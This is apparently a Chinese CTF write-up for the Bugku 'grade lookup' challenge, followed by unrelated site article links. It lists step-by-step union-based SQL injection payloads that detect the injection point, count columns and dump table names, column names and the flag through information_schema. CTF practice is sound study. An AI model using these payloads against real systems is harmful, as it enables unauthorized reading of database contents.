Bugku-13.成绩查询-简单sql注入
2021/8/13 2:06:29
本文主要是介绍Bugku-13.成绩查询-简单sql注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
判断注入点类型
1 显示
1' 不显示
2' and '1'='1 显示2的结果,单引号无括号
判断字段数
1' order by 5--+ 不显示
1' order by 4--+显示,字段数为4
判断可用字段
-1' union select 1,2,3,4--+
获取数据库
获取表名
id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='skctf'),3,4--+
获取字段名
id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='skctf' and table_name='fl4g'),3,4--+
获取flag
id=-1' union select 1,(select skctf_flag from fl4g),3,4--+
这篇关于Bugku-13.成绩查询-简单sql注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-28知识管理革命:文档软件的新玩法了解一下!
- 2024-11-28低代码应用课程:新手入门全攻略
- 2024-11-28哪些办公软件适合团队协作,且能够清晰记录每个阶段的工作进展?
- 2024-11-28全栈低代码开发课程:零基础入门到初级实战
- 2024-11-28拖动排序课程:轻松掌握课程拖动排序功能
- 2024-11-28如何高效管理数字化转型项目
- 2024-11-28SMART法则好用吗?有哪些项目管理工具辅助实现?
- 2024-11-28深度剖析:6 款办公软件如何构建设计团队项目可视化管理新生态?
- 2024-11-28HTTP缓存课程:新手入门指南
- 2024-11-28实战丨证券 HTAP 混合业务场景的难点问题应对